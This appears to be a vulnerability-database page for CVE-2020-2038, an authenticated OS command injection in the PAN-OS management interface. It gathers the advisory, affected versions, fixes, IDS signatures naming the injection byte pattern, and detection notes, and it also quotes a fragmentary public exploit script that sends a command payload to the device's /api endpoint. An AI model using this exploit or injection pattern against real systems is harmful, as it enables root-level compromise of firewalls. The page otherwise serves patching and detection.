CVE-2020-2038
published 2020-09-09CVE-2020-2038: An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root…
PriorityP272high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
86.09%
99.7th percentile
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| palo_alto_networks | pan-os | >= 10.0 < 10.0.1 | 10.0.1 |
| palo_alto_networks | pan-os | >= 9.0 < 9.0.10 | 9.0.10 |
| palo_alto_networks | pan-os | >= 9.1 < 9.1.4 | 9.1.4 |
| paloalto | pan-os | — | — |
| paloaltonetworks | pan-os | >= 10.0.0 < 10.0.1 | 10.0.1 |
| paloaltonetworks | pan-os | >= 9.0.0 < 9.0.10 | 9.0.10 |
| paloaltonetworks | pan-os | >= 9.1.0 < 9.1.4 | 9.1.4 |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT PAN-OS OS Command Injecton Attempt Inbound (CVE-2020-2038)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"?cmd="; content:"|3c 21 5b|CDATA|5b 7c 7c|"; fast_pattern; reference:cve,2020-2038; classtype:attempted-admin; sid:2038688; rev:2; metadata:attack_target Server, created_at 2022_08_31, cve CVE_2020_2038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes
|3c 21 5b|CDATA|5b 7c 7c|
- →Exploit targets the PAN-OS management web interface API endpoint via HTTP GET request with 'cmd' and 'type=op' parameters; look for GET requests to /api with query parameters cmd=, type=op, and key= on management interface traffic. ↗
- →The exploit injects OS commands via the 'cmd' URI parameter using CDATA and pipe (||) sequences; the byte pattern |3c 21 5b|CDATA|5b 7c 7c| in the URI is a high-confidence indicator of exploitation attempt.
- →Palo Alto's own IPS Unique Threat ID 59954 can be enabled on GlobalProtect portal/gateway/VPN traffic as a compensating control to block exploitation attempts. ↗
- →Metasploit module exists for this vulnerability (linux/http/panos_op_cmd_exec); monitor for Metasploit-characteristic HTTP patterns against PAN-OS management interfaces. ↗
- ·Exploitation requires valid administrator credentials; this is an authenticated vulnerability, so stolen or weak admin credentials are a prerequisite attack vector. ↗
- ·The attack surface is the PAN-OS management web interface; restricting network access to this interface per Palo Alto best practices significantly reduces exposure. ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qq25-3qfm-wpjj: An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands wit
ghsa_unreviewed·2022-05-24
CVE-2020-2038 [HIGH] CWE-78 GHSA-qq25-3qfm-wpjj: An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands wit
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.
Palo Alto
PAN-OS: OS command injection vulnerability in the management web interface
vendor_paloalto·2020-09-09·CVSS 7.2
CVE-2020-2038 [HIGH] CWE-78 PAN-OS: OS command injection vulnerability in the management web interface
PAN-OS: OS command injection vulnerability in the management web interface
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges.
Affected products: PAN-OS
Solution: This issue is fixed in PAN-OS 9.0.10, PAN-OS 9.1.4, PAN-OS 10.0.1, and all later PAN-OS versions.
Workaround: Until PAN-OS software is upgraded to a fixed version, enabling signatures for Unique Threat ID 59954 on traffic destined for the GlobalProtect portal, gateway, or VPN will block attacks against CVE-2020-2038.
This issue impacts the PAN-OS management web interface but you can mitigate the impact of this issue by following best practices for securing the PAN-OS management web interface. Please review the
Suricata
ET EXPLOIT PAN-OS OS Command Injecton Attempt Inbound (CVE-2020-2038)
suricata·2022-08-31·CVSS 7.2
CVE-2020-2038 [HIGH] ET EXPLOIT PAN-OS OS Command Injecton Attempt Inbound (CVE-2020-2038)
ET EXPLOIT PAN-OS OS Command Injecton Attempt Inbound (CVE-2020-2038)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT PAN-OS OS Command Injecton Attempt Inbound (CVE-2020-2038)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"?cmd="; content:"|3c 21 5b|CDATA|5b 7c 7c|"; fast_pattern; reference:cve,2020-2038; classtype:attempted-admin; sid:2038688; rev:2; metadata:attack_target Server, created_at 2022_08_31, cve CVE_2020_2038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Exploit-DB
PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
exploitdb·2022-08-09·CVSS 7.2
CVE-2020-2038 [HIGH] PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
---
# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-08-13
# Exploit Author: UnD3sc0n0c1d0
# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038
# Category: Web Application
# Version: 8.8.8.81111'
parameters = {'cmd': payload, 'type': 'op', 'key': apikey}
response = requests.get(target+'api', params=parameters, verify=False)
print(response.text[50:-20])
def usage():
print('\nusage: CVE-2020-2038.py\n\n')
print('arguments:')
print(' -h show this help message and exit')
print(' -t target URL (ex: http://vulnerable.host/)')
print(' -u target administrator user')
print(' -p pasword of the defined user account')
print(' -c command you want to execute on the target\n')
def main(arg
Metasploit
Palo Alto Networks Authenticated Remote Code Execution
metasploit
Palo Alto Networks Authenticated Remote Code Execution
Palo Alto Networks Authenticated Remote Code Execution
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10
Qualys
PAN-OS Critical Buffer Overflow Vulnerability (CVE-2020-2040) – Automatically Discover, Prioritize and Remediate Using Qualys VMDR®
blogs_qualys·2020-09-22·CVSS 8.8
CVE-2020-2040 [HIGH] PAN-OS Critical Buffer Overflow Vulnerability (CVE-2020-2040) – Automatically Discover, Prioritize and Remediate Using Qualys VMDR®
## Table of Contents
DiscoverPAN-OS Buffer Overflow CVE-2020-2040 Vulnerability
On Sept 9, 2020, Palo Alto Networks published nine security bulletins addressing vulnerabilities in PAN-OS operating system versions 8.0 or later. One of the nine CVEs released, CVE-2020-2040 , received a critical severity rating score of 9.8 based on the CVSS v3 Scoring system.
PAN-OS devices are vulnerable to CVE-2020-2040, when a Captive Portal or multi-factor authentication interface is enabled. Once exploited, an unauthenticated user can gain root privileges by sending a malicious request to the PAN-OS device. This vulnerability is rated as critical mainly for two reasons. First, it doesn’t require any authentication; and second, it has the potential to disrupt system processes and execute arbitrary cod
Tenable
CVE-2020-2040: Critical Buffer Overflow Vulnerability in PAN-OS Devices Disclosed
blogs_tenable·2020-09-10·CVSS 9.8
[CRITICAL] CVE-2020-2040: Critical Buffer Overflow Vulnerability in PAN-OS Devices Disclosed
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://packetstormsecurity.com/files/168008/PAN-OS-10.0-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/168408/Palo-Alto-Networks-Authenticated-Remote-Code-Execution.htmlhttps://security.paloaltonetworks.com/CVE-2020-2038http://packetstormsecurity.com/files/168008/PAN-OS-10.0-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/168408/Palo-Alto-Networks-Authenticated-Remote-Code-Execution.htmlhttps://security.paloaltonetworks.com/CVE-2020-2038
2020-09-09
Published